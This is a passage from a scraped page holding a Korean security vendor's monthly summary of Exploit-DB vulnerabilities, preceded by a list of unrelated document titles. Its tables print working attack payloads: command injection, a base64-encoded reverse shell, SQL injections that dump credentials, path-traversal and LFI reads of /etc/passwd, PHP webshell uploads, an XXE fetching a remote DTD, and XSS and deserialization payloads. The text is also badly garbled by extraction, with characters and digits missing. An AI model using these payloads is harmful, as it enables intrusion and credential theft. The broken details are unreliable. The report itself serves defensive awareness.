EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

Similar documents
** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

Observational Determinism for Concurrent Program Security

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

105È£4fš

Secure Programming Lecture1 : Introduction

3장

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

제목 레이아웃

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

ODS-FM1

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

레이아웃 1

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

DW 개요.PDF

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

¿ÀǼҽº°¡À̵å1 -new

게시판 스팸 실시간 차단 시스템

PowerPoint 프레젠테이션

PowerPoint Template

- 목차 - - ios 개발환경및유의사항. - 플랫폼 ios Project. - Native Controller와플랫폼화면연동. - 플랫폼 Web(js)-Native 간데이터공유. - 플랫폼확장 WN Interface 함수개발. - Network Manager clas

PRO1_02E [읽기 전용]

초보자를 위한 ASP.NET 21일 완성

초보자를 위한 ADO 21일 완성

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

F1-1(수정).ppt

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Portal_9iAS.ppt [읽기 전용]

MPLAB C18 C

Inside Android Applications

Interstage5 SOAP서비스 설정 가이드

Microsoft PowerPoint - XP Style

Backup Exec

6강.hwp

KakaoGame Integrated Guidelines _Open

슬라이드 1

Microsoft PowerPoint - file

PowerPoint 프레젠테이션

내지무인화_

Microsoft Word - Automap3

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

로거 자료실

Remote UI Guide

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

chapter1,2.doc

초보자를 위한 ASP.NET 2.0

mytalk

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

슬라이드 1

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

SMB_ICMP_UDP(huichang).PDF

PowerPoint プレゼンテーション

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Microsoft Word - junior.docx

Apache Ivy

1.LAN의 특징과 각종 방식

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

FileMaker 15 WebDirect 설명서

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

PowerPoint 프레젠테이션

rmi_박준용_final.PDF

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

PCServerMgmt7

untitled

uFOCS

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

DR-M140 사용 설명서

05Àå

1217 WebTrafMon II

2007

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

슬라이드 1

Sena Technologies, Inc. HelloDevice Super 1.1.0

목순 차서 v KM의 현황 v Web2.0 의 개념 v Web2.0의 도입 사례 v Web2.0의 KM 적용방안 v 고려사항 1/29

목차 제 1 장 inexio Touch Driver소개 소개 및 주요 기능 제품사양... 4 제 2 장 설치 및 실행 설치 시 주의사항 설치 권고 사양 프로그램 설치 하드웨

MySQL-Ch10

Sena Device Server Serial/IP TM Version

NCS : ERP(SAP) ERP(SAP) SW IT,. SW IT 01., 05., 06., 08., 15., , 05. SW IT,,,, SAP HR,,, 4,,, SAP ABAP HR SCHEMA, BSP,

Transcription:

EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. Cross Site Scripting 공격은일반적으로 Parameter Value 를이용여공격는방법입니다. 지만 월발견된공격들은 Key 값혹은특정 HTTP Header 의 Value 를노리는공격들이주로발견되었습니다. 이러한공격들은특정프로그램에서만발생되는취약점입니다. 해당프로그램을사용는관리자는취약점에노출된페이지를확인여소스코드의시큐어코딩이시급해보입니다. 또한 월은 과관련한다양한공격패턴들도발견되었습니다. 공격은취약한명령어또는함수를파라미터로이용여해당동작을바로실행시킬수있습니다. 따라서특별한경우를제외고는관련명령어나함수를사용지말것을권고합니다. 만약해당명령어와함수를반드시사용해야할경우라면, 입력값을검증는필터에파이프 ( ), 세미콜론 (;) 등멀티라인을지원는특수문자에대한검증을실시여해당함수에유해한값이전달되지못도록해야합니다. 관련취약점이발견된소프트웨어를사용는관리자는취약점이발견된페이지와파라미터를확인여다양한 공격에대한대비가필요해보입니다.. 취약점별보고개수취약점 보고개수 8 7 취약점별보고개수 7 Information Disclosure LFI 6 File Upload 3 SQL 7 XSS 9 총합계 9 4 3 3 0 Information Disclosure LFI File Upload SQL. 위험도별분류 위험도별분류 위험도 보고개수 백분율 6.90% 7.86% 7.4% 합계 9 00.00% 3. 공격난이도별현황 공격난이도 보고개수 백분율 3.4% 6 0.69% 7.86% 총합계 9 00.00% 공격난이도별현황 6 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager PHP Realestate Script Script PHP Imagick Magento extplorer FlatPress CakePHP SAP xmii 총합계 9 주요소프트웨어별취약점발생현황 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager

EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-04 39766 PHP Imagick 3.3.0 - / command injection 취약점 /image.jpg" cat /etc/passwd>a.txt" PHP Imagick PHP Imagick 3.3.0 06-0-04 3976 XSS <.9 0 - ipinfo.cgi XSS 취약점 /cgi-bin/ipinfo.cgi?<script>alert(/rxss-yann_cam_- _Security_Consultant_@ASafety_-_SYNETIS/)</script> <.9 0 06-0-04 3976 XSS Acunetix WP Security Plugin 3.0.3 - XSS 취약점 /wordpress/?s="><script>alert("johto.robbie"</script> Acunetix WP Security Acunetix WP Security Plugin 3.0. /cgibin/ipinfo.cgi?<script>eval(unescape("%76%6%7%0%68 %6%6%64%3D%64%6F%63%7%6D%6%6E%74%E%6 7%6%74%4%6C%6%6D%6%6E%74%73%4%79%4% 6%67%4E%6%6D%6%8%7%68%6%6%64%7%9% B%30%D%3B%76%6%7%0%73%63%7%69%70%74 06-0-04 3976 XSS %3D%0%64%6F%63%7%6D%6%6E%74%E%63%7%6 <.9 0 - %6%74%6%4%6C%6%6D%6%6E%74%8%7%73% ipinfo.cgi XSS 취약점 () 63%7%69%70%74%7%9%3B%73%63%7%69%70%74% E%74%79%70%6%3D%0%7%74%6%78%74%F%6A <.9 0 %6%76%6%73%63%7%69%70%74%7%3B%73%63%7 %69%70%74%E%73%7%63%3D%0%7%68%74%74%70 %3A%F%F%3%39%3%E%3%36%38%E%3%3%33 %E%3%F%78%E%6A%73%7%3B%68%6%6%64%E %6%70%70%6%6E%64%43%68%69%6C%64%8%73%63 %7%69%70%74%9%3B%0A%09%09%09"))</script> POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 06-0-04 3976 <.9 0 - ipinfo.cgi 취약점 (3) <.9 0 NCSA_PASS= touch /tmp/x;#&ncsa_pass_confirm= touch /tmp/x;#&ncsa_username=yanncam&action=ajouter POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 NCSA_PASS= eval `echo -e 06-0-04 3976 "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu <.9 0 - MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI ipinfo.cgi pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi 취약점 (4) GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI <.9 0 CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\ \\\\\nihwmihm7ignsb3nlkgmpoyb9ih0gdhpb GUoYyAhPSAiZXhpdCIpIGNsb3NlKHMp\\\\\\\\n OyB9fScgLRldi9udWxs" openssl enc -a - d`;#&ncsa_pass_confirm= eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\

EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-06 39780 SQL ManageEngine Applications Manager Build 700 - downtimescheduler.do SQL 취약점 /downtimescheduler.do?method=viewmaintenancetask &taskid=- %0UNION%0ALL%0SELECT%0,,database(),4,, 6,7,8,9,0,,,3,4,%0-- ManageEngin e Applications Manager ManageEngin e Applications Manager Build 70 06-0-09 39784 - createpdf.php 취약점 /createpdf.php?targeturl=ly4uly4uly4uly4uly4uly4uly4u Ly4uLV0Yy9wYXNzdQ=&&pay_id=4&&type=actual - Multiple Vulnerabilities 06-0-09 39784 XSS - createpdf.php XSS 취약점 () POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 screen_name="><script><<imgimg SRC=oi onerror=javascript:alert()> POST /admin/default/pack_custom/test HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 06-0-6 398 LFI Webpy.4. - pack_custom LFI 취약점 () Webpy Webpy.4. file=/etc/passwd 06-0-6 3987 SQL Web interface for DNSmasq / Mikrotik - dns.php SQL 취약점 /dns_dhcp/dns/dns.php?net=%0and%0(select%0 %0from(select%0count(*),concat((select%0(select% 0concat(0xb,host,0xb,user,0xb,password,0xb))%0 from%0mysql.user%0limit%0),floor(rand(0)*))x% 0from%0mysql.user%0group%0by%0x)a) DNSmasq Web interface for DNSmasq 06-0-6 3986 File Upload extplorer..9 - Archive Path POST / HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f extplorer extplorer.. -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" <?php exec($_get["cmd"]);?> -----------------------------7dd009908f-- 06-0-6 3983 XSS CakePHP Framework 3..4 - /cake/cake3/ XSS 취약점 GET /cake/cake3/ HTTP/. CLIENT-IP: 00.00.300.400 <script>alert('poc');</script> CakePHP CakePHP Framework 3..4 06-0-6 398 XSS Webpy.4. - /admin/default/install_plugin/ XSS 취약점 /admin/default/install_plugin/test?plugin=mathpy&sourc e=javascript:alert() Webpy Webpy.4. 06-0-7 39837 SAP xmii.0 - /XMII/ 취약점 /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../.. /../../../../../../../etc/passwd SAP xmii SAP xmii.0

EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /rest/v/guest-carts/test/set-payment-information HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 Content-Type: application/json 06-0-8 39838 Magento <.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File {"paymentmethod":{"method":"checkmo","additional_data": {"additional_information":"o:3:\\\\"credis_client\\\\" ::{s:8:\\\\"\\\\u0000*\\\\u0000redis\\\\";o:4: \\\\"Magento\\\\\\\\Sales\\\\\\\\Model\\\ \\\\\Order\\\\\\\\Payment\\\\\\\\Transactio n\\\\":40:{s:9:\\\\"\\\\u0000*\\\\u0000_order\ \\\";N;s::\\\\"\\\\u0000*\\\\u0000_parentTran saction\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_chi ldren\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_iden tifiedchildren\\\\";n;s:7:\\\\"\\\\u0000*\\\\u00 00_transactionsAutoLinking\\\\";b:;s:4:\\\\"\\\\u 0000*\\\\u0000_isFailsafe\\\\";b:;s::\\\\"\\\\ u0000*\\\\u0000_haschild\\\\";n;s::\\\\"\\\\u 0000*\\\\u0000_eventPrefix\\\\";s:3:\\\\"sales_ord er_payment_transaction\\\\";s::\\\\"\\\\u0000*\ \\\u0000_eventobject\\\\";s::\\\\"order_payment Magento Magento <.0.6 06-0-3 39849 SQL.4. for XenForo - Multiple SQL s () /api.php?action=getgroup&value=' UNION ALL SELECT NULL%CNULL%CNULL%CNULL%CNULL%CCONC AT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo 06-0-3 39849 SQL.4. for XenForo - Multiple SQL s /api.php?action=getusers&value=' UNION ALL SELECT CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo 06-0-4 3980 Information Disclosure AfterLogic WebMail Pro ASP.NET 6..6 - Administrator Account Disclosure via XXE /spellcheck.aspx?xml=<?xml version=".0" encoding="utf- 8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://8.7..9/test.dtd"> %remote; %int; %trick;]> AfterLogic WebMail AfterLogic WebMail Pro ASP.NET 6..6 06-0-6 398 File Upload Portal 4. - File Upload () POST /upload.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f Portal Portal 4. -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="test.php" <? phpinfo();?> -----------------------------7dd009908f-- 06-0-6 3986 SQL EduSec 4.. - SQL /student/stumaster/view?id=%0union%0select%0,load_file( %7/etc/passwd%7),3,4,,6,7,8,9,0,,,3,4,, 6,7,8-- EduSec EduSec 4.. 06-0-6 398 XSS Portal 4. - XSS () /index.php?title=onmousemove=alert() Portal Portal 4. 06-0-7 39864 SQL PHP Realestate Script Script 4.9.0 - SQL /single.php?view_id=- 7+/*!0000union*/+select+,,user_name,4,,6,7,8,pa ssword,0,,,3,4,,6,7,8,9,0,,,3,4,,6+from+admin_login PHP Realestate Script Script PHP Realestate Script Script 4.9.0 06-0-30 39868 SQL Open Source Script 3.6.0 - SQL /contact_view.php?contact=- 7%7+/*!0000union*/+select+,,3,4,,6,7,8,9, 0,,0,3,4,,6,7,8,9,0,username,,password, 4,,6,7,8,9,30,3,3,33,34,3,36,37+/*!0000fr om*/+/*!0000admin_login*/%3 Open Source Script Open Source Script 3.6.0

EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-3 3987 XSS POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker 3.0..7 - Chrome/6.0.9.7 /sysworkflow/en/neoclassic/pro cessproxy/saveprocess XSS 취약 점 PRO_TITLE=AA<img src=x onerror=alert()>a&pro_description=bbb&pro_cate GORY= ProcessMaker ProcessMaker 3.0..7 06-0-3 3987 LFI NanoStation M.6-beta - scr.cgi LFI 취약점 /scr.cgi?fname=../../../../../etc/passwd%00&status= NanoStation M.6-bet 06-0-3 39870 File Upload FlatPress.0.3 - admin.php File Upload 취약점 POST /flatpress/admin.php?p=uploader&action=default HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="upload[]"; filename="test.php" FlatPress FlatPress.0.3 <? phpinfo();?> -----------------------------7dd009908f-- 06-0-3 3987 XSS POST /sysworkflow/en/neoclassic/processes/processeslist HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker 3.0..7 - Chrome/6.0.9.7 /sysworkflow/en/neoclassic/pro cesses/processeslist XSS 취약점 # ProcessMaker ProcessMaker 3.0..7 processname=<img src=x onerror=alert();>&start=0&limit=&category=%3creset %3E= 06-0-3 3987 NanoStation M.6-beta /scr.cgi?fname=rc.poststart.sh;cat%0/etc/hosts%00&status - scr.cgi 취 = 약점 NanoStation M.6-bet